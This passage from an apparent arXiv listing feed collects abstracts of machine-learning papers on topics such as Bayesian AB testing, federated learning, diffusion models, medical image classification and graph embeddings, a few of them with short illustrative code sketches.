forecasting baselines.
    Rapid and Scalable Bayesian AB Testing. (arXiv:2307.14628v1 [cs.LG])
    AB testing aids business operators with their decision making, and is considered the gold standard method for learning from data to improve digital user experiences. However, there is usually a gap between the requirements of practitioners, and the constraints imposed by the statistical hypothesis testing methodologies commonly used for analysis of AB tests. These include the lack of statistical power in multivariate designs with many factors, correlations between these factors, the need of sequential testing for early stopping, and the inability to pool knowledge from past tests. Here, we propose a solution that applies hierarchical Bayesian estimation to address the above limitations. In comparison to current sequential AB testing methodology, we increase statistical power by exploiting correlations between factors, enabling sequential testing and progressive early stopping, without incurring excessive false positive risk. We also demonstrate how this methodology can be extended to enable the extraction of composite global learnings from past AB tests, to accelerate future tests. We underpin our work with a solid theoretical framework that articulates the value of hierarchical estimation. We demonstrate its utility using both numerical simulations and a large set of real-world AB tests. Together, these results highlight the practical value of our approach for statistical inference in the technology industry.
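A minimal empirical-Bayes sketch conveys the pooling intuition behind hierarchical estimation. This is not the paper's full model: `prior_strength` is an assumed pseudo-count that a complete hierarchical approach would infer from past tests rather than fix by hand.

```python
import numpy as np

def shrunk_rates(successes, trials, prior_strength=50.0):
    """Shrink each variant's conversion rate toward the pooled grand mean
    via a Beta(a0, b0) prior with a0 + b0 = prior_strength pseudo-
    observations. Small, noisy arms get pulled hardest, which curbs
    false positives from early peeking at underpowered arms."""
    s = np.asarray(successes, dtype=float)
    t = np.asarray(trials, dtype=float)
    grand = s.sum() / t.sum()                    # pooled rate across arms
    a0 = grand * prior_strength                  # prior successes
    return (s + a0) / (t + prior_strength)       # posterior-mean estimate

# A well-measured arm (10/1000) and a tiny, noisy arm (2/10)
rates = shrunk_rates([10, 2], [1000, 10])
```

The tiny arm's raw rate of 0.2 is pulled strongly toward the pooled mean, while the large arm barely moves; full hierarchical Bayesian estimation generalizes this shrinkage across correlated factors and sequential looks.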
    Bipartite Ranking Fairness through a Model Agnostic Ordering Adjustment. (arXiv:2307.14668v1 [cs.LG])
Algorithmic fairness has been a serious concern and has received substantial interest in the machine learning community. In this paper, we focus on the bipartite ranking scenario, where the instances come from either the positive or negative class and the goal is to learn a ranking function that ranks positive instances higher than negative ones. While there can be a trade-off between fairness and performance, we propose a model-agnostic post-processing framework, xOrder, for achieving fairness in bipartite ranking while maintaining the algorithm's classification performance. In particular, we optimize a weighted sum of the utility by identifying an optimal warping path across different protected groups, solved through a dynamic programming process. xOrder is compatible with various classification models and ranking fairness metrics, including supervised and unsupervised fairness metrics. In addition to binary groups, xOrder can be applied to multiple protected groups. We evaluate our proposed algorithm on four benchmark data sets and two real-world patient electronic health record repositories. xOrder consistently achieves a better balance between algorithm utility and ranking fairness on a variety of datasets with different metrics. Visualizations of the calibrated ranking scores show that xOrder mitigates the score distribution shifts between groups compared with baselines. Moreover, additional analytical results verify that xOrder achieves robust performance when faced with fewer samples and a larger difference between training and testing ranking score distributions.
    Complete and separate: Conditional separation with missing target source attribute completion. (arXiv:2307.14609v1 [cs.SD])
    Recent approaches in source separation leverage semantic information about their input mixtures and constituent sources that when used in conditional separation models can achieve impressive performance. Most approaches along these lines have focused on simple descriptions, which are not always useful for varying types of input mixtures. In this work, we present an approach in which a model, given an input mixture and partial semantic information about a target source, is trained to extract additional semantic data. We then leverage this pre-trained model to improve the separation performance of an uncoupled multi-conditional separation network. Our experiments demonstrate that the separation performance of this multi-conditional model is significantly improved, approaching the performance of an oracle model with complete semantic information. Furthermore, our approach achieves performance levels that are comparable to those of the best performing specialized single conditional models, thus providing an easier to use alternative.
    Understanding Silent Failures in Medical Image Classification. (arXiv:2307.14729v1 [eess.IV])
    To ensure the reliable use of classification systems in medical applications, it is crucial to prevent silent failures. This can be achieved by either designing classifiers that are robust enough to avoid failures in the first place, or by detecting remaining failures using confidence scoring functions (CSFs). A predominant source of failures in image classification is distribution shifts between training data and deployment data. To understand the current state of silent failure prevention in medical imaging, we conduct the first comprehensive analysis comparing various CSFs in four biomedical tasks and a diverse range of distribution shifts. Based on the result that none of the benchmarked CSFs can reliably prevent silent failures, we conclude that a deeper understanding of the root causes of failures in the data is required. To facilitate this, we introduce SF-Visuals, an interactive analysis tool that uses latent space clustering to visualize shifts and failures. On the basis of various examples, we demonstrate how this tool can help researchers gain insight into the requirements for safe application of classification systems in the medical domain. The open-source benchmark and tool are at: https://github.com/IML-DKFZ/sf-visuals.
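A common baseline confidence scoring function in such comparisons is maximum softmax probability (MSP); a minimal sketch (variable names are ours):

```python
import numpy as np

def msp_confidence(logits):
    """Maximum softmax probability: a per-sample confidence score.
    Low values flag predictions that should be deferred for review
    rather than allowed to fail silently."""
    z = logits - logits.max(axis=1, keepdims=True)   # numerical stability
    p = np.exp(z) / np.exp(z).sum(axis=1, keepdims=True)
    return p.max(axis=1)

logits = np.array([[5.0, 0.0, 0.0],    # confident prediction
                   [0.3, 0.2, 0.1]])   # ambiguous -> low confidence
conf = msp_confidence(logits)
```

Thresholding such a score turns silent failures into explicit deferrals; the paper's finding is precisely that no benchmarked score of this kind is reliable under all distribution shifts.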
    Prot2Text: Multimodal Protein's Function Generation with GNNs and Transformers. (arXiv:2307.14367v1 [q-bio.QM])
The complex nature of large biological systems has led some scientists to regard their full understanding as an inconceivable mission. Challenges at different levels complicate this task; one of them is the prediction of a protein's function. In recent years, significant progress has been made in this field through the development of various machine learning approaches. However, most existing methods formulate the task as a multi-classification problem, i.e., assigning predefined labels to proteins. In this work, we propose a novel approach, \textbf{Prot2Text}, which predicts a protein's function in a free-text style, moving beyond conventional binary or categorical classifications. By combining Graph Neural Networks (GNNs) and Large Language Models (LLMs) in an encoder-decoder framework, our model effectively integrates diverse data types, including protein sequences, structures, and textual annotations. This multimodal approach allows for a holistic representation of proteins' functions, enabling the generation of detailed and accurate descriptions. To evaluate our model, we extracted a multimodal protein dataset from SwissProt and demonstrate empirically the effectiveness of Prot2Text. These results highlight the transformative impact of multimodal models, specifically the fusion of GNNs and LLMs, empowering researchers with powerful tools for more accurate prediction of proteins' functions. The code, the models, and a demo will be publicly released.
    Synergies Between Federated Learning and O-RAN: Towards an Elastic Virtualized Architecture for Multiple Distributed Machine Learning Services. (arXiv:2305.02109v2 [cs.NI] UPDATED)
    Federated learning (FL) is the most popular distributed machine learning technique. However, implementation of FL over modern wireless networks faces key challenges caused by (i) dynamics of the network conditions and (ii) the coexistence of multiple FL services/tasks and other network services in the system, which are not jointly considered in prior works. Motivated by these challenges, we introduce a generic FL paradigm over NextG networks, called dynamic multi-service FL (DMS-FL). We identify three unexplored design considerations in DMS-FL: (i) FL service operator accumulation, (ii) wireless resource fragmentation, and (iii) signal strength fluctuations. We take the first steps towards addressing these design considerations by proposing a novel distributed ML architecture called elastic virtualized FL (EV-FL). EV-FL unleashes the full potential of Open RAN (O-RAN) systems and introduces an elastic resource provisioning methodology to execute FL services. It further constitutes a multi-time-scale FL management system that introduces three dimensions into existing FL architectures: (i) virtualization, (ii) scalability, and (iii) elasticity. Through investigating EV-FL, we reveal a series of open research directions for future work. We finally simulate EV-FL to demonstrate its potential in saving wireless resources and increasing fairness among FL services.
    A Predictive Model of Digital Information Engagement: Forecasting User Engagement With English Words by Incorporating Cognitive Biases, Computational Linguistics and Natural Language Processing. (arXiv:2307.14500v1 [cs.HC])
    This study introduces and empirically tests a novel predictive model for digital information engagement (IE) - the READ model, an acronym for the four pivotal attributes of engaging information: Representativeness, Ease-of-use, Affect, and Distribution. Conceptualized within the theoretical framework of Cumulative Prospect Theory, the model integrates key cognitive biases with computational linguistics and natural language processing to develop a multidimensional perspective on information engagement. A rigorous testing protocol was implemented, involving 50 randomly selected pairs of synonymous words (100 words in total) from the WordNet database. These words' engagement levels were evaluated through a large-scale online survey (n = 80,500) to derive empirical IE metrics. The READ attributes for each word were then computed and their predictive efficacy examined. The findings affirm the READ model's robustness, accurately predicting a word's IE level and distinguishing the more engaging word from a pair of synonyms with an 84% accuracy rate. The READ model's potential extends across various domains, including business, education, government, and healthcare, where it could enhance content engagement and inform AI language model development and generative text work. Future research should address the model's scalability and adaptability across different domains and languages, thereby broadening its applicability and efficacy.
    Controlling the Inductive Bias of Wide Neural Networks by Modifying the Kernel's Spectrum. (arXiv:2307.14531v1 [cs.LG])
    Wide neural networks are biased towards learning certain functions, influencing both the rate of convergence of gradient descent (GD) and the functions that are reachable with GD in finite training time. As such, there is a great need for methods that can modify this bias according to the task at hand. To that end, we introduce Modified Spectrum Kernels (MSKs), a novel family of constructed kernels that can be used to approximate kernels with desired eigenvalues for which no closed form is known. We leverage the duality between wide neural networks and Neural Tangent Kernels and propose a preconditioned gradient descent method, which alters the trajectory of GD. As a result, this allows for a polynomial and, in some cases, exponential training speedup without changing the final solution. Our method is both computationally efficient and simple to implement.
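The spectrum-modification idea can be sketched at the Gram-matrix level. This is a hedged illustration: the function and transform names are ours, and the paper works with NTK spectra and preconditioned GD, whereas here we simply reshape the eigenvalues of an RBF kernel matrix.

```python
import numpy as np

def modified_spectrum_kernel(K, transform):
    """Eigendecompose a PSD kernel matrix and apply a user-chosen
    transform to its eigenvalues, yielding a kernel matrix with a
    prescribed spectrum (same eigenvectors, new eigenvalues)."""
    vals, vecs = np.linalg.eigh(K)
    vals = transform(np.clip(vals, 0.0, None))   # clip keeps the result PSD
    return (vecs * vals) @ vecs.T

# Example: compress the spectrum with a square root, which flattens the
# eigenvalue decay and can speed up kernel gradient descent.
X = np.random.default_rng(0).normal(size=(20, 3))
K = np.exp(-np.sum((X[:, None] - X[None]) ** 2, axis=-1))  # RBF Gram matrix
K_mod = modified_spectrum_kernel(K, np.sqrt)
```

Flattening the spectrum this way is one concrete instance of "modifying the kernel's spectrum": slowly-learned eigendirections (small eigenvalues) are boosted relative to dominant ones.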
    Spatial-Frequency U-Net for Denoising Diffusion Probabilistic Models. (arXiv:2307.14648v1 [cs.CV])
    In this paper, we study the denoising diffusion probabilistic model (DDPM) in wavelet space, instead of pixel space, for visual synthesis. Considering the wavelet transform represents the image in spatial and frequency domains, we carefully design a novel architecture SFUNet to effectively capture the correlation for both domains. Specifically, in the standard denoising U-Net for pixel data, we supplement the 2D convolutions and spatial-only attention layers with our spatial frequency-aware convolution and attention modules to jointly model the complementary information from spatial and frequency domains in wavelet data. Our new architecture can be used as a drop-in replacement to the pixel-based network and is compatible with the vanilla DDPM training process. By explicitly modeling the wavelet signals, we find our model is able to generate images with higher quality on CIFAR-10, FFHQ, LSUN-Bedroom, and LSUN-Church datasets, than the pixel-based counterpart.
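A one-level 2D Haar transform shows concretely what "wavelet space" means here. It is a minimal stand-in for the DWT the paper uses: the image splits into a low-frequency approximation (LL) and three detail subbands (LH, HL, HH), and SFUNet-style layers would then operate jointly on these spatial-frequency channels.

```python
import numpy as np

def haar2d(img):
    """One-level 2D Haar transform of an even-sized grayscale image.
    Returns the (LL, LH, HL, HH) subbands, each at half resolution."""
    a = (img[0::2] + img[1::2]) / 2                      # row-pair average
    d = (img[0::2] - img[1::2]) / 2                      # row-pair detail
    ll = (a[:, 0::2] + a[:, 1::2]) / 2                   # low-low
    lh = (a[:, 0::2] - a[:, 1::2]) / 2                   # low-high
    hl = (d[:, 0::2] + d[:, 1::2]) / 2                   # high-low
    hh = (d[:, 0::2] - d[:, 1::2]) / 2                   # high-high
    return ll, lh, hl, hh
```

For a constant image all detail subbands are exactly zero, so the signal concentrates in LL; natural images behave similarly, which is why modeling the subbands explicitly can help a diffusion model.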
    HyperFed: Hyperbolic Prototypes Exploration with Consistent Aggregation for Non-IID Data in Federated Learning. (arXiv:2307.14384v1 [cs.LG])
Federated learning (FL) collaboratively models user data in a decentralized way. However, in the real world, non-identical and independent data distributions (non-IID) among clients hinder the performance of FL due to three issues, i.e., (1) the class statistics shifting, (2) the insufficient hierarchical information utilization, and (3) the inconsistency in aggregating clients. To address the above issues, we propose HyperFed, which contains three main modules, i.e., hyperbolic prototype Tammes initialization (HPTI), hyperbolic prototype learning (HPL), and consistent aggregation (CA). Firstly, HPTI in the server constructs uniformly distributed and fixed class prototypes, and shares them with clients to match class statistics, further guiding consistent feature representation for local clients. Secondly, HPL in each client captures the hierarchical information in local data with the supervision of shared class prototypes in the hyperbolic model space. Additionally, CA in the server mitigates the impact of the inconsistent deviations from clients to server. Extensive studies on four datasets show that HyperFed is effective in enhancing the performance of FL under non-IID settings.
    Fact-Checking of AI-Generated Reports. (arXiv:2307.14634v1 [cs.AI])
    With advances in generative artificial intelligence (AI), it is now possible to produce realistic-looking automated reports for preliminary reads of radiology images. This can expedite clinical workflows, improve accuracy and reduce overall costs. However, it is also well-known that such models often hallucinate, leading to false findings in the generated reports. In this paper, we propose a new method of fact-checking of AI-generated reports using their associated images. Specifically, the developed examiner differentiates real and fake sentences in reports by learning the association between an image and sentences describing real or potentially fake findings. To train such an examiner, we first created a new dataset of fake reports by perturbing the findings in the original ground truth radiology reports associated with images. Text encodings of real and fake sentences drawn from these reports are then paired with image encodings to learn the mapping to real/fake labels. The utility of such an examiner is demonstrated for verifying automatically generated reports by detecting and removing fake sentences. Future generative AI approaches can use the resulting tool to validate their reports leading to a more responsible use of AI in expediting clinical workflows.
    NSA: Naturalistic Support Artifact to Boost Network Confidence. (arXiv:2307.14917v1 [cs.CV])
Visual AI systems are vulnerable to natural and synthetic physical corruption in the real world. Such corruption often arises unexpectedly and alters the model's performance. In recent years, the primary focus has been on adversarial attacks. However, natural corruptions (e.g., snow, fog, dust) are an omnipresent threat to visual AI systems and should be considered equally important. Many existing works propose interesting solutions for training robust models against natural corruption. These works either leverage image augmentations, which come with the additional cost of model training, or place suspicious patches in the scene to design unadversarial examples. In this work, we propose the idea of naturalistic support artifacts (NSAs) for robust prediction. NSAs are shown to be beneficial in scenarios where model parameters are inaccessible and adding artifacts to the scene is feasible. NSAs are natural-looking objects generated through artifact training with a DC-GAN to have high visual fidelity in the scene. Testing against natural corruptions on the Imagenette dataset, we observe a fourfold improvement in prediction confidence score. We also demonstrate NSAs' capability to increase adversarial accuracy by 8\% on average. Lastly, we qualitatively analyze NSAs using saliency maps to understand how they help improve prediction confidence.
    DBGSA: A Novel Data Adaptive Bregman Clustering Algorithm. (arXiv:2307.14375v1 [cs.LG])
With the development of big data technology, data analysis has become increasingly important. Traditional clustering algorithms such as K-means are highly sensitive to the initial centroid selection and perform poorly on non-convex datasets. In this paper, we address these problems by proposing a data-driven Bregman divergence parameter optimization clustering algorithm (DBGSA), which combines the Universal Gravitational Algorithm to bring similar points closer together in the dataset. We construct a gravitational coefficient equation with a special property that gradually reduces the influence factor as the iteration progresses. Furthermore, we introduce the Bregman divergence generalized power mean information loss minimization to identify cluster centers and build a hyperparameter identification optimization model, which effectively solves the problems of manual adjustment and uncertainty in the improved dataset. Extensive experiments are conducted on four simulated datasets and six real datasets. The results demonstrate that DBGSA significantly improves the accuracy of various clustering algorithms, by an average of 63.8\% compared to other similar approaches such as enhanced clustering algorithms and improved datasets. Additionally, a three-dimensional grid search was established to compare the effects of different parameter values within threshold conditions, and it was discovered that the parameter set provided by our model is optimal. This finding provides strong evidence of the high accuracy and robustness of the algorithm.
    Prediction of depression status in college students using a Naive Bayes classifier based machine learning model. (arXiv:2307.14371v1 [cs.LG])
This study presents a machine learning model based on the Naive Bayes classifier for predicting the level of depression in university students. The objective was to improve prediction accuracy using a model trained on 70% of the data and validated on the remaining 30%. The collected data includes factors associated with depression from 519 university students. The results showed an accuracy of 78.03%, high sensitivity in detecting positive cases of depression, especially at moderate and severe levels, and significant specificity in correctly classifying negative cases. These findings highlight the effectiveness of the model in the early detection and treatment of depression, benefiting vulnerable groups and contributing to improved mental health in the student population.
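The pipeline described above (70/30 split plus a Naive Bayes classifier) can be sketched from scratch. The real 519-student survey is not public, so the data below is a synthetic stand-in with two continuous features, and we use the Gaussian variant of Naive Bayes.

```python
import numpy as np

rng = np.random.default_rng(0)
# Synthetic stand-in for the survey: 519 samples, 2 features, binary label.
n = 519
X = np.vstack([rng.normal(0, 1, (n // 2, 2)),        # class 0
               rng.normal(2, 1, (n - n // 2, 2))])   # class 1
y = np.array([0] * (n // 2) + [1] * (n - n // 2))
perm = rng.permutation(n)
X, y = X[perm], y[perm]

split = int(0.7 * n)                                 # 70% train / 30% validate
Xtr, ytr, Xva, yva = X[:split], y[:split], X[split:], y[split:]

# Gaussian Naive Bayes: per-class feature means/variances + log prior.
stats = {}
for c in (0, 1):
    Xc = Xtr[ytr == c]
    stats[c] = (Xc.mean(0), Xc.var(0) + 1e-9, np.log(len(Xc) / len(Xtr)))

def log_posterior(x, c):
    mu, var, log_prior = stats[c]
    return log_prior - 0.5 * np.sum(np.log(2 * np.pi * var) + (x - mu) ** 2 / var)

pred = np.array([max((0, 1), key=lambda c: log_posterior(x, c)) for x in Xva])
accuracy = (pred == yva).mean()
```

On this easy synthetic data the accuracy is high; on real survey data with categorical factors one would typically use a multinomial or Bernoulli Naive Bayes instead.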
    Limits to Reservoir Learning. (arXiv:2307.14474v1 [cs.LG])
    In this work, we bound a machine's ability to learn based on computational limitations implied by physicality. We start by considering the information processing capacity (IPC), a normalized measure of the expected squared error of a collection of signals to a complete basis of functions. We use the IPC to measure the degradation under noise of the performance of reservoir computers, a particular kind of recurrent network, when constrained by physical considerations. First, we show that the IPC is at most a polynomial in the system size $n$, even when considering the collection of $2^n$ possible pointwise products of the $n$ output signals. Next, we argue that this degradation implies that the family of functions represented by the reservoir requires an exponential number of samples to learn in the presence of the reservoir's noise. Finally, we conclude with a discussion of the performance of the same collection of $2^n$ functions without noise when being used for binary classification.
    Learned Gridification for Efficient Point Cloud Processing. (arXiv:2307.14354v1 [cs.CV])
Neural operations that rely on neighborhood information are much more expensive when deployed on point clouds than on grid data due to the irregular distances between points in a point cloud. In a grid, on the other hand, we can compute the kernel only once and reuse it for all query positions. As a result, operations that rely on neighborhood information scale much worse for point clouds than for grid data, especially for large inputs and large neighborhoods. In this work, we address the scalability issue of point cloud methods by tackling its root cause: the irregularity of the data. We propose learnable gridification as the first step in a point cloud processing pipeline to transform the point cloud into a compact, regular grid. Thanks to gridification, subsequent layers can use operations defined on regular grids, e.g., Conv3D, which scale much better than native point cloud methods. We then extend gridification to point cloud to point cloud tasks, e.g., segmentation, by adding a learnable de-gridification step at the end of the point cloud processing pipeline to map the compact, regular grid back to its original point cloud form. Through theoretical and empirical analysis, we show that gridified networks scale better in terms of memory and time than networks directly applied on raw point cloud data, while being able to achieve competitive results. Our code is publicly available at https://github.com/computri/gridifier.
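A non-learned sketch makes the gridification step concrete. The paper learns this point-to-grid mapping; the version below is a fixed average-pooling stand-in (names and resolution are ours) whose output a regular Conv3D could then consume.

```python
import numpy as np

def gridify(points, feats, res=8):
    """Scatter per-point features into a res^3 voxel grid by averaging.
    points: (N, 3) coordinates; feats: (N, C) features.
    Returns a (res, res, res, C) array ready for grid operations."""
    lo = points.min(axis=0)
    span = np.maximum(points.max(axis=0) - lo, 1e-9)       # avoid div by 0
    idx = np.minimum(((points - lo) / span * res).astype(int), res - 1)
    grid = np.zeros((res, res, res, feats.shape[1]))
    count = np.zeros((res, res, res, 1))
    for (i, j, k), f in zip(idx, feats):
        grid[i, j, k] += f
        count[i, j, k] += 1
    return grid / np.maximum(count, 1)                     # voxel-wise mean
```

Once points live on a regular grid, neighborhood kernels are shared across all positions, which is the source of the scaling advantage the abstract describes; a learnable de-gridification would invert this map for point-to-point tasks.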
    VISPUR: Visual Aids for Identifying and Interpreting Spurious Associations in Data-Driven Decisions. (arXiv:2307.14448v1 [cs.HC])
Big data and machine learning tools have jointly empowered humans in making data-driven decisions. However, many of them capture empirical associations that might be spurious due to confounding factors and subgroup heterogeneity. The famous Simpson's paradox is such a phenomenon where aggregated and subgroup-level associations contradict each other, causing cognitive confusions and difficulty in making adequate interpretations and decisions. Existing tools provide little insight for humans to locate, reason about, and prevent pitfalls of spurious association in practice. We propose VISPUR, a visual analytic system that provides a causal analysis framework and a human-centric workflow for tackling spurious associations. These include a CONFOUNDER DASHBOARD, which can automatically identify possible confounding factors, and a SUBGROUP VIEWER, which allows for the visualization and comparison of diverse subgroup patterns that likely or potentially result in a misinterpretation of causality. Additionally, we propose a REASONING STORYBOARD, which uses a flow-based approach to illustrate paradoxical phenomena, as well as an interactive DECISION DIAGNOSIS panel that helps ensure accountable decision-making. Through an expert interview and a controlled user experiment, our qualitative and quantitative results demonstrate that the proposed "de-paradox" workflow and the designed visual analytic system are effective in helping human users to identify and understand spurious associations, as well as to make accountable causal decisions.
    Piecewise Linear Functions Representable with Infinite Width Shallow ReLU Neural Networks. (arXiv:2307.14373v1 [cs.LG])
    This paper analyzes representations of continuous piecewise linear functions with infinite width, finite cost shallow neural networks using the rectified linear unit (ReLU) as an activation function. Through its integral representation, a shallow neural network can be identified by the corresponding signed, finite measure on an appropriate parameter space. We map these measures on the parameter space to measures on the projective $n$-sphere cross $\mathbb{R}$, allowing points in the parameter space to be bijectively mapped to hyperplanes in the domain of the function. We prove a conjecture of Ongie et al. that every continuous piecewise linear function expressible with this kind of infinite width neural network is expressible as a finite width shallow ReLU neural network.
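For orientation, the integral representation the abstract refers to can be sketched as follows (notation is illustrative and follows the common convention in this line of work, not necessarily the paper's exact symbols): an infinite-width shallow ReLU network with signed measure $\mu$ on the parameter space represents

```latex
f(x) \;=\; \int_{\mathbb{S}^{d-1} \times \mathbb{R}} \big[\langle w, x \rangle - b\big]_{+} \, d\mu(w, b) \;+\; \langle v, x \rangle \;+\; c,
```

with the "finite cost" condition corresponding to $\mu$ having finite total variation. Each pair $(w, b)$ determines the hyperplane $\{x : \langle w, x\rangle = b\}$, which is the bijective map to hyperplanes mentioned in the abstract.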
    Learnable wavelet neural networks for cosmological inference. (arXiv:2307.14362v1 [astro-ph.IM])
Convolutional neural networks (CNNs) have been shown to both extract more information than the traditional two-point statistics from cosmological fields, and marginalise over astrophysical effects extremely well. However, CNNs require large amounts of training data, which is potentially problematic in the domain of expensive cosmological simulations, and it is difficult to interpret the network. In this work we apply the learnable scattering transform, a kind of convolutional neural network that uses trainable wavelets as filters, to the problem of cosmological inference and marginalisation over astrophysical effects. We present two models based on the scattering transform, one constructed for performance, and one constructed for interpretability, and perform a comparison with a CNN. We find that scattering architectures are able to outperform a CNN, significantly so in the case of small training data samples. Additionally we present a lightweight scattering network that is highly interpretable.
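A first-order scattering coefficient is just "wavelet convolution, modulus, average pooling". This toy 1D sketch (names and shapes are illustrative; the paper works on 2D cosmological fields and makes the wavelets trainable parameters) shows the structure:

```python
import numpy as np

def scattering_first_order(x, wavelets, pool=8):
    """First-order scattering coefficients of a 1D signal.

    For each wavelet filter: convolve, take the modulus (a non-linearity
    that is stable to deformations), then average-pool. In a *learnable*
    scattering transform, the entries of `wavelets` are trained.
    Returns an array of shape (len(wavelets), len(x) // pool).
    """
    out = []
    for w in wavelets:
        u = np.abs(np.convolve(x, w, mode="same"))
        out.append(u.reshape(-1, pool).mean(axis=1))
    return np.stack(out)

x = np.sin(np.linspace(0.0, 6.28, 64))
filters = [np.array([1.0, -1.0]), np.array([1.0, 0.0, -1.0])]
S = scattering_first_order(x, filters)
print(S.shape)  # (2, 8)
```

Because there are only a handful of filter coefficients to learn, such architectures need far less training data than a generic CNN, which matches the small-sample advantage reported in the abstract.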
    Forecasting, capturing and activation of carbon-dioxide (CO$_2$): Integration of Time Series Analysis, Machine Learning, and Material Design. (arXiv:2307.14374v1 [cs.LG])
This study provides a comprehensive time series analysis of daily industry-specific, country-wise CO$_2$ emissions from January 2019 to February 2023. The research focuses on the Power, Industry, Ground Transport, Domestic Aviation, and International Aviation sectors in European countries (EU27 & UK, Italy, Germany, Spain) and India, utilizing near-real-time activity data from the Carbon Monitor research initiative. To identify regular emission patterns, the data from the year 2020 is excluded due to the disruptive effects caused by the COVID-19 pandemic. The study then performs a principal component analysis (PCA) to determine the key contributors to CO$_2$ emissions. The analysis reveals that the Power, Industry, and Ground Transport sectors account for a significant portion of the variance in the dataset. A 7-day moving averaged dataset is employed for further analysis to facilitate robust predictions. This dataset captures both short-term and long-term trends and enhances the quality of the data for prediction purposes. The study utilizes Long Short-Term Memory (LSTM) models on the 7-day moving averaged dataset to effectively predict emissions and provide insights for policy decisions, mitigation strategies, and climate change efforts. During the training phase, the stability and convergence of the LSTM models are ensured, which guarantees their reliability in the testing phase, as indicated by the evaluation of the loss function. The model achieves high efficiency, as demonstrated by $R^2$ values ranging from 0.8242 to 0.995 for various countries and sectors. Furthermore, the study proposes utilizing scandium and boron/aluminium-based thin films as exceptionally efficient materials for capturing CO$_2$ (with a binding energy range from -3.0 to -3.5 eV). These materials are shown to surpass the affinity of graphene and boron nitride sheets in this regard.
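The 7-day moving-average smoothing step described above is a one-liner; this sketch assumes a trailing window over a daily series (the exact alignment the study uses is not specified in the abstract):

```python
import numpy as np

def moving_average(daily, window=7):
    """Trailing moving average of a daily series.

    Smooths out day-of-week effects before feeding the series to a
    forecasting model; returns len(daily) - window + 1 values.
    """
    kernel = np.ones(window) / window
    return np.convolve(daily, kernel, mode="valid")

smoothed = moving_average(np.arange(1.0, 8.0))
print(smoothed)  # [4.] -- the mean of days 1..7
```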
    HUGE: Huge Unsupervised Graph Embeddings with TPUs. (arXiv:2307.14490v1 [cs.LG])
    Graphs are a representation of structured data that captures the relationships between sets of objects. With the ubiquity of available network data, there is increasing industrial and academic need to quickly analyze graphs with billions of nodes and trillions of edges. A common first step for network understanding is Graph Embedding, the process of creating a continuous representation of nodes in a graph. A continuous representation is often more amenable, especially at scale, for solving downstream machine learning tasks such as classification, link prediction, and clustering. A high-performance graph embedding architecture leveraging Tensor Processing Units (TPUs) with configurable amounts of high-bandwidth memory is presented that simplifies the graph embedding problem and can scale to graphs with billions of nodes and trillions of edges. We verify the embedding space quality on real and synthetic large-scale datasets.
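The underlying objective of unsupervised graph embedding can be shown in a few lines; this is a deliberately tiny numpy sketch of "edges get high dot products, random pairs get low ones" with negative sampling. Everything here is illustrative — the paper's contribution is the TPU/high-bandwidth-memory architecture that scales this kind of objective, not this loop:

```python
import numpy as np

def train_embeddings(edges, n_nodes, dim=8, epochs=300, lr=0.1, seed=0):
    """Toy unsupervised node embedding via logistic loss on edges
    vs. randomly sampled negative pairs (skip-gram style)."""
    rng = np.random.default_rng(seed)
    Z = 0.1 * rng.standard_normal((n_nodes, dim))
    for _ in range(epochs):
        for u, v in edges:
            # positive pair: increase sigmoid(Z[u] . Z[v])
            s = 1.0 / (1.0 + np.exp(-Z[u] @ Z[v]))
            Z[u], Z[v] = Z[u] + lr * (1 - s) * Z[v], Z[v] + lr * (1 - s) * Z[u]
            # negative pair: decrease sigmoid(Z[u] . Z[w]) for random w
            w = int(rng.integers(n_nodes))
            s = 1.0 / (1.0 + np.exp(-Z[u] @ Z[w]))
            Z[u], Z[w] = Z[u] - lr * s * Z[w], Z[w] - lr * s * Z[u]
    return Z

# two disjoint triangles: nodes within a triangle should embed nearby
edges = [(0, 1), (1, 2), (0, 2), (3, 4), (4, 5), (3, 5)]
Z = train_embeddings(edges, n_nodes=6)
```

The resulting continuous vectors can then be handed to any downstream classifier or clustering routine, which is the "first step for network understanding" role the abstract describes.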
    Learning to simulate partially known spatio-temporal dynamics with trainable difference operators. (arXiv:2307.14395v1 [cs.LG])
    Recently, using neural networks to simulate spatio-temporal dynamics has received a lot of attention. However, most existing methods adopt pure data-driven black-box models, which have limited accuracy and interpretability. By combining trainable difference operators with black-box models, we propose a new hybrid architecture explicitly embedded with partial prior knowledge of the underlying PDEs named PDE-Net++. Furthermore, we introduce two distinct options called the trainable flipping difference layer (TFDL) and the trainable dynamic difference layer (TDDL) for the difference operators. Numerous numerical experiments have demonstrated that PDE-Net++ has superior prediction accuracy and better extrapolation performance than black-box models.
    The Effect of Spoken Language on Speech Enhancement using Self-Supervised Speech Representation Loss Functions. (arXiv:2307.14502v1 [eess.AS])
    Recent work in the field of speech enhancement (SE) has involved the use of self-supervised speech representations (SSSRs) as feature transformations in loss functions. However, in prior work, very little attention has been paid to the relationship between the language of the audio used to train the self-supervised representation and that used to train the SE system. Enhancement models trained using a loss function which incorporates a self-supervised representation that shares exactly the language of the noisy data used to train the SE system show better performance than those which do not match exactly. This may lead to enhancement systems which are language specific and as such do not generalise well to unseen languages, unlike models trained using traditional spectrogram or time domain loss functions. In this work, SE models are trained and tested on a number of different languages, with self-supervised representations which themselves are trained using different language combinations and with differing network structures as loss function representations. These models are then tested across unseen languages and their performances are analysed. It is found that the training language of the self-supervised representation appears to have a minor effect on enhancement performance, the amount of training data of a particular language, however, greatly affects performance.
    Federated Distributionally Robust Optimization with Non-Convex Objectives: Algorithm and Analysis. (arXiv:2307.14364v1 [math.OC])
Distributionally Robust Optimization (DRO), which aims to find an optimal decision that minimizes the worst case cost over the ambiguity set of probability distribution, has been widely applied in diverse applications, e.g., network behavior analysis, risk management, etc. However, existing DRO techniques face three key challenges: 1) how to deal with the asynchronous updating in a distributed environment; 2) how to leverage the prior distribution effectively; 3) how to properly adjust the degree of robustness according to different scenarios. To this end, we propose an asynchronous distributed algorithm, named Asynchronous Single-looP alternatIve gRadient projEction (ASPIRE) algorithm with the itErative Active SEt method (EASE) to tackle the federated distributionally robust optimization (FDRO) problem. Furthermore, a new uncertainty set, i.e., constrained D-norm uncertainty set, is developed to effectively leverage the prior distribution and flexibly control the degree of robustness. Finally, our theoretical analysis elucidates that the proposed algorithm is guaranteed to converge and the iteration complexity is also analyzed. Extensive empirical studies on real-world datasets demonstrate that the proposed method can not only achieve fast convergence and remain robust against data heterogeneity as well as malicious attacks, but also trade off robustness against performance.
    What Kinds of Contracts Do ML APIs Need?. (arXiv:2307.14465v1 [cs.SE])
